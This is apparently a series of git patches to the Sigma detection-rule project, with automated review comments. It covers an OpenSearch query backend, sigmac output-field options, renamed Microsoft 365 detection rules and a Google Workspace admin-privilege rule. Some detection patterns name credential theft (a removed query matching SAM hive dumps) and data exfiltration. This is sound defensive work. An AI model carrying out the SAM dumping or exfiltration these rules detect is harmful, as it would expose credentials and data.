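Review bot: The new `'''...'''` blocks placed above `expand_group`, `convert_bool_array` and `adjust_matches` are not docstrings: a string statement before `def` is evaluated and discarded, so `expand_group.__doc__` stays `None` and `help()` and IDEs show nothing. Move each one inside the function as its first statement, e.g. `def expand_group(s: str) -> str:` followed by `"""Expand a special group of the form A:(B OR C) into (A:B OR A:C)."""`. The `reg = r"(?...` literals are cut off in this rendering so I cannot check the lookbehinds; and since the first hunk deletes the `fnmatch`, `randrange`, `strtobool` and `yaml` imports, please confirm nothing outside the shown hunks still references them, as that would now fail only at call time.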
@@ -222,11 +221,10 @@ def translate_ary(ary: Ary) -> dict: # Iterate through each statement and join match statements into array for boolean in parsedExpression: - # print(f'Boolean: {boolean}\nCurrMatches: {currMatches}\n') currMatches.append(translate_boolean(boolean)) - + + # If bool array contains a Group, match statements must also be wrapped in a bool. if contains_group(parsedExpression): - print(f"\nContains Group; currMatches: {currMatches}\n") currMatches = adjust_matches(currMatches) currQuery = { @@ -235,8 +233,6 @@ def translate_ary(ary: Ary) -> dict: } } - # print(f'\nCurrQuery: {currQuery}') - clauses.append(currQuery) translateIndex += 1 @@ -293,7 +289,6 @@ class OpenSearchBackend(object): # reset per-detection variables self.rule_threshold = {} translation = super().generate(sigmaparser) - print(f'translation: {translation}\n') if translation: index = sigmaparser.get_logsource().index if len(index) == 0: 
@@ -381,16 +376,25 @@ class OpenSearchBackend(object): } ''' - Builds OpenSearch monitor query from translated Elastic Common Schema query. + Builds OpenSearch monitor query from translated Elastic Rule query. Forms an abstract syntax tree (AST) + using the following repeated structures: + - Atom = A:B + - Rel = AND | OR + - Ary = Bool [Rel Bool]* + - Group = (Ary) + - SGroup = A:(B OR C) + - Bool = Atom | Group | SGroup + + Then translates AST into OpenSearch boolean queries. ''' def build_query(self, translation): - # print(f'\nparsed translation: {translation.strip("()").split("OR")}\n') - translation = "(winlog.channel:\"System\" AND winlog.event_id:\"16\" OR winlog.event_data.HiveName.keyword:*\\\\AppData\\\\Local\\\\Temp\\\\SAM* OR winlog.event_data.HiveName.keyword:*.dmp)" - # translation = '(winlog.event_id:"5156" AND (winlog.event_data.SourcePort:"3389" AND winlog.event_data.DestAddress.keyword:(127.* OR \:\:1)))' - ast = parse_group(translation) - print("\nAST: " + str(ast) + "\n") - return translate_group(ast) + translatedQuery = translate_group(ast) + + if self.isThreshold: + translatedQuery["bool"]["filter"] = self.rule_threshold + + return translatedQuery ''' Builds inputs field of OS monitor. @@ -565,8 +569,6 @@ class OpenSearchQsBackend(OpenSearchBackend, ElasticsearchQuerystringBackend): def generateAggregation(self, agg): if agg.aggfunc == SigmaAggregationParser.AGGFUNC_COUNT: - if agg.cond_op not in [">", ">="]: - raise NotImplementedError("Threshold rules can only handle > and >= operators") if agg.aggfield: raise NotImplementedError("Threshold rules cannot COUNT(DISTINCT %s)" % agg.aggfield) self.isThreshold = True diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 4ba2f840..350ffb86 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -18,6 +18,7 @@ import sys import argparse import yaml +import ruamel.yaml import json import pathlib import itertools 
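Review bot: `translatedQuery["bool"]["filter"] = self.rule_threshold` in build_query assumes translate_group always returns a dict with a top-level `bool` key; if a single-term translation can come back as a bare match clause (translate_group is not in this hunk, so I cannot tell), a threshold rule fails with KeyError instead of getting its filter. Making the contract explicit, `if "bool" not in translatedQuery: raise NotImplementedError("Threshold rules require a bool query")`, turns that into a clear error, and note the assignment also overwrites any `filter` entry already present rather than extending it. The new triple-quoted description above `def build_query` sits in the class body rather than inside the method, so it is not the method's docstring; move it under the `def` line.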
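Review bot: Dropping the `cond_op not in [">", ">="]` guard in generateAggregation means a threshold rule written with `<`, `<=`, `=` or `!=` is now accepted without any visible handling of those operators; unless the monitor trigger built from `self.rule_threshold` (outside this hunk) implements them, such a rule converts cleanly but alerts on the wrong side of the count, a silent detection gap rather than a loud failure. Either keep the guard, `if agg.cond_op not in [">", ">="]: raise NotImplementedError("Threshold rules can only handle > and >= operators")`, or add a comment naming where the other comparison operators are translated. The enclosing method continues past the end of the hunk.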
@@ -53,10 +54,14 @@ ERR_RULE_FILTER_PARSING = 11 ERR_CONFIG_REQUIRED = 20 ERR_CONFIG_ORDER = 21 ERR_CONFIG_BACKEND = 22 +ERR_OUTPUT_FORMAT = 30 ERR_NOT_IMPLEMENTED = 42 ERR_PARTIAL_FIELD_MATCH = 80 ERR_FULL_FIELD_MATCH = 90 +# Allowed fields in output +allowed_fields = ["title", "id", "status", "description", "author", "references", "fields", "falsepositives", "level", "tags", "filename"] + def alliter(path): for sub in path.iterdir(): if sub.name.startswith("."): 
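Review bot: `allowed_fields` is a module-level constant but is named like a local and defined as a mutable list; `ALLOWED_FIELDS = frozenset({...})` (or at least a tuple under the current name) signals intent and still works with the `in` tests used later in main(). It is also the only place `filename` is listed as a permitted value, while the `--output-fields` help text in the `@@ -104` hunk enumerates the fields without it; deriving the help text from this constant keeps the two from drifting.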
@@ -104,7 +109,12 @@ def set_argparser(): argparser.add_argument("--lists", "-l", action="store_true", help="List available output target formats and configurations") argparser.add_argument("--config", "-c", action="append", help="Configurations with field name and index mapping for target environment. Multiple configurations are merged into one. Last config is authoritative in case of conflicts.") argparser.add_argument("--output", "-o", default=None, help="Output file or filename prefix (if end with a '_','/' or '\\')") - argparser.add_argument("--output-extention", "-e", default=None, help="Extention of Output file for filename prefix use") + argparser.add_argument("--output-fields", "-of", help="""Enhance your output with additional fields from the Sigma rule (not only the converted rule itself). + Select the fields you want by providing their list delimited with commas (no space). Only work with the '--output-format' option and with 'json' or 'yaml' value. + available additional fields : title, id, status, description, author, references, fields, falsepositives, level, tags. + This option do not have any effect for backends that already format output : elastalert, kibana, splukxml etc. """) + argparser.add_argument("--output-format", "-oF", choices=["json", "yaml"], help="Use only if you want to have JSON or YAML output (default is raw text)") + argparser.add_argument("--output-extention", "-e", default=None, help="Extension of Output file for filename prefix use") argparser.add_argument("--print0", action="store_true", help="Delimit results by NUL-character") argparser.add_argument("--backend-option", "-O", action="append", help="Options and switches that are passed to the backend") argparser.add_argument("--backend-config", "-C", help="Configuration file (YAML format) containing options to pass to the backend") 
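Review bot: The new `-of` and `-oF` aliases are multi-character single-dash options that differ only in letter case, next to an existing `-o` that takes a value; argparse accepts them, but they read like clustered short flags and are easy to mistype into `-o f` or `-o F`, so I would register only the long forms `--output-fields` and `--output-format`. The help text for `--output-fields` lists the selectable fields without `filename`, which the `allowed_fields` list in the `@@ -53` hunk does permit, and has some grammar slips (`Only work with`, `This option do not have any effect`, `splukxml`); building that list from the constant, e.g. `"available additional fields: %s" % ", ".join(allowed_fields)`, avoids the drift. `--output-extention` keeps its misspelled option name even though its help string was corrected to `Extension`; adding a `--output-extension` alias would let the typo be retired without breaking existing scripts.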
@@ -213,11 +223,20 @@ def main(): print("Sigma configuration parse error in %s: %s" % (conf_name, str(e)), file=sys.stderr) exit(ERR_CONFIG_PARSING) + if cmdargs.output_fields: + if cmdargs.output_format: + output_fields_rejected = [field for field in cmdargs.output_fields.split(",") if field not in allowed_fields] # Not allowed fields + if output_fields_rejected: + print("These fields are not allowed (check help for allow field list) : %s" % (", ".join(output_fields_rejected)), file=sys.stderr) + exit(ERR_OUTPUT_FORMAT) + else: + output_fields_filtered = [field for field in cmdargs.output_fields.split(",") if field in allowed_fields] # Keep only allowed fields + else: + print("The '--output-fields' or '-of' arguments must be used with '--output-format' or '-oF' equal to 'json' or 'yaml'", file=sys.stderr) + exit(ERR_OUTPUT_FORMAT) + backend_options = BackendOptions(cmdargs.backend_option, cmdargs.backend_config) - print(f'backend options: {cmdargs.backend_config}') backend = backend_class(sigmaconfigs, backend_options) - print(f'sigma configs: {backend_options}') - print(f'backend: {backend}') filename_ext = cmdargs.output_extention filename = cmdargs.output @@ -243,6 +262,7 @@ def main(): out = sys.stdout error = 0 + output_array = [] for sigmafile in get_inputs(cmdargs.inputs, cmdargs.recurse): logger.debug("* Processing Sigma input %s" % (sigmafile)) try: @@ -251,14 +271,14 @@ def main(): else: f = sigmafile.open(encoding='utf-8') parser = SigmaCollectionParser(f, sigmaconfigs, rulefilter, sigmafile) - print(f'\nparser: {parser.parsers[0].condtoken} \n {parser.parsers[0].condparsed[0]}\n') results = parser.generate(backend) - + nb_result = len(list(copy.deepcopy(results))) inc_filenane = None if nb_result < 2 else 0 - newline_separator = '\0' if cmdargs.print0 else '\n' + + results = list(results) # Since results is an iterator and used twice we convert it a list for result in results: if not fileprefix == None and not inc_filenane == None: #yml action try: 
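Review bot: In the `--output-fields` validation block, `output_fields_filtered` is recomputed with a second comprehension even though, once `output_fields_rejected` is empty, every entry of the split list is allowed; one split serves both: `requested = cmdargs.output_fields.split(",")`, `output_fields_rejected = [f for f in requested if f not in allowed_fields]`, `output_fields_filtered = requested`. Checking `cmdargs.output_format` first as a guard clause would also flatten the nesting. `allow field list` in the error message should read `allowed field list`.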
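Review bot: This hunk deletes `newline_separator = '\0' if cmdargs.print0 else '\n'`, but the new `print(result, file=out, end=newline_separator)` in the following `@@ -277` hunk still reads that name; unless it is defined somewhere outside these hunks, the first converted rule raises NameError and `--print0` loses its effect. With `results = list(results)` now materialising the results, the earlier `len(list(copy.deepcopy(results)))` pass is redundant: `results = list(parser.generate(backend))` followed by `nb_result = len(results)` iterates the backend once. main() continues past the end of this hunk.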
@@ -277,27 +297,32 @@ def main(): except (IOError, OSError) as e: print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) exit(ERR_OUTPUT) - print(result, file=out, end=newline_separator) - - if nb_result == 0: # elastalert return "results=[]" so get a error with out not def - if not fileprefix == None and not inc_filenane == None: #yml action + if not cmdargs.output_fields: + print(result, file=out, end=newline_separator) + + if cmdargs.output_fields: # Handle output fields + output={} + f.seek(0) + docs = yaml.load_all(f, Loader=yaml.FullLoader) + for doc in docs: + for k,v in doc.items(): + if k in output_fields_filtered: + output[k] = v + output['rule'] = [result for result in results] + if "filename" in output_fields_filtered: + output['filename'] = str(sigmafile.name) + output_array.append(output) + + if nb_result == 0: # backend get only 1 output + if not fileprefix == None: # want a prefix anyway try: - filename = fileprefix + str(sigmafile.name) - filename = filename.replace('.yml','_' + str(inc_filenane) + filename_ext) - inc_filenane += 1 - out = open(filename, "w", encoding='utf-8') - except (IOError, OSError) as e: - print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) - exit(ERR_OUTPUT) - elif not fileprefix == None and inc_filenane == None: # a simple yml - try: - filename = fileprefix + str(sigmafile.name) - filename = filename.replace('.yml',filename_ext) + filename = "%s%s_mono_output%s" % (fileprefix,cmdargs.target,filename_ext) out = open(filename, "w", encoding='utf-8') + fileprefix = None # no need to open the same file many time except (IOError, OSError) as e: print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) exit(ERR_OUTPUT) - + except OSError as e: print("Failed to open Sigma file %s: %s" % (sigmafile, str(e)), file=sys.stderr) error = ERR_OPEN_SIGMA_RULE 
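Review bot: The new `--output-fields` branch re-parses the rule file with `yaml.load_all(f, Loader=yaml.FullLoader)`; Sigma rules are plain mappings and lists, so `yaml.safe_load_all(f)` is sufficient and keeps the converter on the SafeLoader constructor set when rule files come from less trusted sources. Inside `for result in results`, `output['rule'] = [result for result in results]` copies the whole result list into every per-result dict, so a rule that yields two queries produces two identical entries in `output_array`; build the entry once per rule with `output['rule'] = results` outside the loop, or store only the current `result`. `f.seek(0)` assumes `f` is seekable, which may not hold if the `else:` branch above it has an alternative input source such as stdin (not visible here). main() continues beyond this hunk.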
@@ -323,13 +348,12 @@ def main(): error = ERR_BACKEND if not cmdargs.defer_abort: sys.exit(error) - # except (NotImplementedError, TypeError) as e: - # print("An unsupported feature is required for this Sigma rule (%s): " % (sigmafile) + str(e), file=sys.stderr) - # print("Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma", file=sys.stderr) - # if not cmdargs.ignore_backend_errors: - # error = ERR_NOT_IMPLEMENTED - # if not cmdargs.defer_abort: - # sys.exit(error) + except (NotImplementedError, TypeError) as e: + print("An unsupported feature is required for this Sigma rule (%s): " % (sigmafile) + str(e), file=sys.stderr) + if not cmdargs.ignore_backend_errors: + error = ERR_NOT_IMPLEMENTED + if not cmdargs.defer_abort: + sys.exit(error) except PartialMatchError as e: print("Error: Partial field match error: %s" % str(e), file=sys.stderr) if not cmdargs.ignore_backend_errors: @@ -347,10 +371,17 @@ def main(): f.close() except: pass - + result = backend.finalize() if result: print(result, file=out) + + if cmdargs.output_fields: + if cmdargs.output_format == 'json': + print(json.dumps(output_array, indent=4, ensure_ascii=False), file=out) + elif cmdargs.output_format == 'yaml': + print(ruamel.yaml.round_trip_dump(output_array), file=out) + out.close() sys.exit(error) From c0e58d3c276ba3a9de7bc2e01af4ed554d8e5a5b Mon Sep 17 00:00:00 2001 
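Review bot: `ruamel.yaml.round_trip_dump(output_array)` adds a new third-party dependency (the `import ruamel.yaml` from the `@@ -18` hunk) for a single call, and it is the legacy function API that ruamel.yaml has deprecated in favour of the `YAML()` object; PyYAML is already imported as `yaml`, so `print(yaml.safe_dump(output_array, allow_unicode=True, sort_keys=False), file=out)` yields the YAML output without the extra requirement. The restored `except (NotImplementedError, TypeError)` in the `@@ -323` hunk also treats any TypeError raised by a backend as an unsupported feature, which hides genuine programming errors behind a friendly message; logging it with `logger.debug("backend error", exc_info=True)` there keeps the traceback recoverable. main() continues past the end of this hunk.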
From: Austin Songer Date: Mon, 23 Aug 2021 23:00:58 +0000 Subject: [PATCH 0538/1367] Update --- ...ed_user.yml => microsoft365_activity_by_terminated_user.yml} | 2 +- ...ml => microsoft365_activity_from_anonymous_ip_addresses.yml} | 2 +- ...ry.yml => microsoft365_activity_from_infrequent_country.yml} | 2 +- ...l => microsoft365_data_exfiltration_to_unsanctioned_app.yml} | 2 +- ...resses.yml => microsoft365_from_suspicious_ip_addresses.yml} | 2 +- ...address.yml => microsoft365_logon_from_risky_ip_address.yml} | 2 +- ...warding.yml => microsoft365_suspicious_inbox_forwarding.yml} | 2 +- ...rosoft365_suspicious_oauth_app_file_download_activities.yml} | 2 +- 8 files changed, 8 insertions(+), 8 deletions(-) rename rules/cloud/m365/{m365_activity_by_terminated_user.yml => microsoft365_activity_by_terminated_user.yml} (95%) rename rules/cloud/m365/{m365_activity_from_anonymous_ip_addresses.yml => microsoft365_activity_from_anonymous_ip_addresses.yml} (94%) rename rules/cloud/m365/{m365_activity_from_infrequent_country.yml => microsoft365_activity_from_infrequent_country.yml} (95%) rename rules/cloud/m365/{m365_data_exfiltration_to_unsanctioned_app.yml => microsoft365_data_exfiltration_to_unsanctioned_app.yml} (94%) rename rules/cloud/m365/{m365_from_suspicious_ip_addresses.yml => microsoft365_from_suspicious_ip_addresses.yml} (95%) rename rules/cloud/m365/{m365_logon_from_risky_ip_address.yml => microsoft365_logon_from_risky_ip_address.yml} (95%) rename rules/cloud/m365/{m365_suspicious_inbox_forwarding.yml => microsoft365_suspicious_inbox_forwarding.yml} (95%) rename rules/cloud/m365/{m365_suspicious_oauth_app_file_download_activities.yml => microsoft365_suspicious_oauth_app_file_download_activities.yml} (93%) 
diff --git a/rules/cloud/m365/m365_activity_by_terminated_user.yml b/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml similarity index 95% rename from rules/cloud/m365/m365_activity_by_terminated_user.yml rename to rules/cloud/m365/microsoft365_activity_by_terminated_user.yml index 738af6e9..c24d42b6 100644 --- a/rules/cloud/m365/m365_activity_by_terminated_user.yml +++ b/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml @@ -1,4 +1,4 @@ -title: Activity performed by terminated user +title: Activity Performed by Terminated User id: 2e669ed8-742e-4fe5-b3c4-5a59b486c2ee status: experimental description: Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce. This is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company. diff --git a/rules/cloud/m365/m365_activity_from_anonymous_ip_addresses.yml b/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml similarity index 94% rename from rules/cloud/m365/m365_activity_from_anonymous_ip_addresses.yml rename to rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml index cf1cb871..7b3a7271 100644 --- a/rules/cloud/m365/m365_activity_from_anonymous_ip_addresses.yml +++ b/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml @@ -1,4 +1,4 @@ -title: Activity from anonymous IP addresses +title: Activity from Anonymous IP Addresses id: d8b0a4fe-07a8-41be-bd39-b14afa025d95 status: experimental description: Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address. 
diff --git a/rules/cloud/m365/m365_activity_from_infrequent_country.yml b/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml similarity index 95% rename from rules/cloud/m365/m365_activity_from_infrequent_country.yml rename to rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml index 9c8a433f..9aa5ab39 100644 --- a/rules/cloud/m365/m365_activity_from_infrequent_country.yml +++ b/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml @@ -1,4 +1,4 @@ -title: Activity from infrequent country +title: Activity from Infrequent Country id: 0f2468a2-5055-4212-a368-7321198ee706 status: experimental description: Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization. diff --git a/rules/cloud/m365/m365_data_exfiltration_to_unsanctioned_app.yml b/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml similarity index 94% rename from rules/cloud/m365/m365_data_exfiltration_to_unsanctioned_app.yml rename to rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml index 09256f6a..831a15ed 100644 --- a/rules/cloud/m365/m365_data_exfiltration_to_unsanctioned_app.yml +++ b/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml @@ -1,4 +1,4 @@ -title: Data exfiltration to unsanctioned apps +title: Data Exfiltration to Unsanctioned Apps id: 2b669496-d215-47d8-bd9a-f4a45bf07cda status: experimental description: Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization. 
diff --git a/rules/cloud/m365/m365_from_suspicious_ip_addresses.yml b/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml similarity index 95% rename from rules/cloud/m365/m365_from_suspicious_ip_addresses.yml rename to rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml index 1714b0cd..9be142d8 100644 --- a/rules/cloud/m365/m365_from_suspicious_ip_addresses.yml +++ b/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml @@ -1,4 +1,4 @@ -title: Activity from suspicious IP addresses +title: Activity from Suspicious IP Addresses id: a3501e8e-af9e-43c6-8cd6-9360bdaae498 status: experimental description: Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence. These IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account. diff --git a/rules/cloud/m365/m365_logon_from_risky_ip_address.yml b/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml similarity index 95% rename from rules/cloud/m365/m365_logon_from_risky_ip_address.yml rename to rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml index 99950ddc..55d1b405 100644 --- a/rules/cloud/m365/m365_logon_from_risky_ip_address.yml +++ b/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml @@ -1,4 +1,4 @@ -title: Logon from a risky IP address +title: Logon from a Risky IP Address id: c191e2fa-f9d6-4ccf-82af-4f2aba08359f status: experimental description: Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address. diff --git a/rules/cloud/m365/m365_suspicious_inbox_forwarding.yml b/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml similarity index 95% rename from rules/cloud/m365/m365_suspicious_inbox_forwarding.yml rename to rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml index 5975e8b3..513e4f1b 100644 
--- a/rules/cloud/m365/m365_suspicious_inbox_forwarding.yml +++ b/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml @@ -1,4 +1,4 @@ -title: Suspicious inbox forwarding +title: Suspicious Inbox Forwarding id: 6c220477-0b5b-4b25-bb90-66183b4089e8 status: experimental description: Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address. diff --git a/rules/cloud/m365/m365_suspicious_oauth_app_file_download_activities.yml b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml similarity index 93% rename from rules/cloud/m365/m365_suspicious_oauth_app_file_download_activities.yml rename to rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml index 29944ff4..6dbc4be4 100644 --- a/rules/cloud/m365/m365_suspicious_oauth_app_file_download_activities.yml +++ b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml @@ -1,4 +1,4 @@ -title: Suspicious OAuth app file download activities +title: Suspicious OAuth App File Download Activities id: ee111937-1fe7-40f0-962a-0eb44d57d174 status: experimental description: Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user. From 8382bbfe09a0ee3f6e154842e393305e5b383b54 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 19:37:46 -0500 Subject: [PATCH 0539/1367] Create gworkspace_user_assigned_admin_role.yml --- rules/gworkspace_user_assigned_admin_role.yml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 rules/gworkspace_user_assigned_admin_role.yml diff --git a/rules/gworkspace_user_assigned_admin_role.yml b/rules/gworkspace_user_assigned_admin_role.yml new file mode 100644 index 00000000..09cfcc4f --- /dev/null 
+++ b/rules/gworkspace_user_assigned_admin_role.yml @@ -0,0 +1,21 @@ +title: Google Workspace User Assigned Admin Role +id: 2d1b83e4-17c6-4896-a37b-29140b40a788 +description: Detects when an admin role is assigned to a Google Workspace user. +author: Austin Songer +status: experimental +date: 2021/08/23 +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 +logsource: + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + admin.alert.name: google.admin.AdminService.grantAdminPrivilege + condition: selection +level: medium +tags: + - attack.persistence + - attack.t1098 +falsepositives: + - Google Workspace admin role assigned, may be modified by system administrators. From c767da91d13062c892c76040dc414f8c55ba241c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 19:38:01 -0500 Subject: [PATCH 0540/1367] Delete gworkspace_user_assigned_admin_role.yml --- rules/gworkspace_user_assigned_admin_role.yml | 21 ------------------- 1 file changed, 21 deletions(-) delete mode 100644 rules/gworkspace_user_assigned_admin_role.yml diff --git a/rules/gworkspace_user_assigned_admin_role.yml b/rules/gworkspace_user_assigned_admin_role.yml deleted file mode 100644 index 09cfcc4f..00000000 --- a/rules/gworkspace_user_assigned_admin_role.yml +++ /dev/null 
@@ -1,21 +0,0 @@ -title: Google Workspace User Assigned Admin Role -id: 2d1b83e4-17c6-4896-a37b-29140b40a788 -description: Detects when an admin role is assigned to a Google Workspace user. -author: Austin Songer -status: experimental -date: 2021/08/23 -references: - - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 -logsource: - service: google_workspace.admin -detection: - selection: - eventService: admin.googleapis.com - admin.alert.name: google.admin.AdminService.grantAdminPrivilege - condition: selection -level: medium -tags: - - attack.persistence - - attack.t1098 -falsepositives: - - Google Workspace admin role assigned, may be modified by system administrators. From 6b1f0b83f424ba88aec537a42d322a4008b65f04 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 19:38:47 -0500 Subject: [PATCH 0541/1367] Create workspace_user_assigned_admin_role.yml --- .../workspace_user_assigned_admin_role.yml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 rules/cloud/gworkspace/workspace_user_assigned_admin_role.yml diff --git a/rules/cloud/gworkspace/workspace_user_assigned_admin_role.yml b/rules/cloud/gworkspace/workspace_user_assigned_admin_role.yml new file mode 100644 index 00000000..09cfcc4f --- /dev/null +++ b/rules/cloud/gworkspace/workspace_user_assigned_admin_role.yml 
@@ -0,0 +1,21 @@ +title: Google Workspace User Assigned Admin Role +id: 2d1b83e4-17c6-4896-a37b-29140b40a788 +description: Detects when an admin role is assigned to a Google Workspace user. +author: Austin Songer +status: experimental +date: 2021/08/23 +references: + - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 +logsource: + service: google_workspace.admin +detection: + selection: + eventService: admin.googleapis.com + admin.alert.name: google.admin.AdminService.grantAdminPrivilege + condition: selection +level: medium +tags: + - attack.persistence + - attack.t1098 +falsepositives: + - Google Workspace admin role assigned, may be modified by system administrators. From 3dd201d36f694a4e477858bf99e7a118cd3ef5f2 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 19:38:58 -0500 Subject: [PATCH 0542/1367] Rename workspace_user_assigned_admin_role.yml to gworkspace_user_assigned_admin_role.yml --- ...ned_admin_role.yml => gworkspace_user_assigned_admin_role.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/cloud/gworkspace/{workspace_user_assigned_admin_role.yml => gworkspace_user_assigned_admin_role.yml} (100%) diff --git a/rules/cloud/gworkspace/workspace_user_assigned_admin_role.yml b/rules/cloud/gworkspace/gworkspace_user_assigned_admin_role.yml similarity index 100% rename from rules/cloud/gworkspace/workspace_user_assigned_admin_role.yml rename to rules/cloud/gworkspace/gworkspace_user_assigned_admin_role.yml From ede0332f222de278d3e14ed0d099fc34cf5db0a1 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 19:40:20 -0500 Subject: [PATCH 0543/1367] Delete microsoft365_suspicious_inbox_manipulation_rules.yml --- ...65_suspicious_inbox_manipulation_rules.yml | 24 ------------------- 1 file changed, 24 deletions(-) delete mode 100644 rules/cloud/m365/microsoft365_suspicious_inbox_manipulation_rules.yml 
diff --git a/rules/cloud/m365/microsoft365_suspicious_inbox_manipulation_rules.yml b/rules/cloud/m365/microsoft365_suspicious_inbox_manipulation_rules.yml deleted file mode 100644 index 5bcdf480..00000000 --- a/rules/cloud/m365/microsoft365_suspicious_inbox_manipulation_rules.yml +++ /dev/null @@ -1,24 +0,0 @@ -title: Microsoft 365 - Suspicious inbox manipulation rules -id: d2001772-f43f-4def-86d3-a9d5c47588c0 -status: experimental -description: Detects when a Microsoft Cloud App Security reported for suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address. -author: Austin Songer @austinsonger -date: 2021/08/23 -references: - - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy - - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference -logsource: - category: ThreatManagement - service: m365 -detection: - selection: - eventSource: SecurityComplianceCenter - eventName: "Suspicious inbox manipulation rules" - status: success - condition: selection -falsepositives: - - Unknown -level: medium -tags: - - attack.exfiltration - - attack.t1020.001 \ No newline at end of file From 0fe2b3f5695a2ca9b1bb5d2dd0cd478555f810c0 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 19:52:32 -0500 Subject: [PATCH 0544/1367] Update and rename gworkspace_user_assigned_admin_role.yml to gworkspace_user_granted_admin_privileges.yml --- ....yml => gworkspace_user_granted_admin_privileges.yml} | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) rename rules/cloud/gworkspace/{gworkspace_user_assigned_admin_role.yml => gworkspace_user_granted_admin_privileges.yml} (51%) 
diff --git a/rules/cloud/gworkspace/gworkspace_user_assigned_admin_role.yml b/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml similarity index 51% rename from rules/cloud/gworkspace/gworkspace_user_assigned_admin_role.yml rename to rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml index 09cfcc4f..39d05f14 100644 --- a/rules/cloud/gworkspace/gworkspace_user_assigned_admin_role.yml +++ b/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml @@ -1,21 +1,22 @@ -title: Google Workspace User Assigned Admin Role +title: Google Workspace User Granted Admin Privileges id: 2d1b83e4-17c6-4896-a37b-29140b40a788 -description: Detects when an admin role is assigned to a Google Workspace user. +description: Detects when an Google Workspace user is granted admin privileges. author: Austin Songer status: experimental date: 2021/08/23 references: - https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3 + - https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE logsource: service: google_workspace.admin detection: selection: eventService: admin.googleapis.com - admin.alert.name: google.admin.AdminService.grantAdminPrivilege + eventName: GRANT_ADMIN_PRIVILEGE condition: selection level: medium tags: - attack.persistence - attack.t1098 falsepositives: - - Google Workspace admin role assigned, may be modified by system administrators. + - Google Workspace admin role privileges, may be modified by system administrators. From aa7a8a3e71446183c861fb0bab850fb3555aafc5 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 19:58:20 -0500 Subject: [PATCH 0545/1367] Update gworkspace_user_granted_admin_privileges.yml --- .../gworkspace/gworkspace_user_granted_admin_privileges.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) 
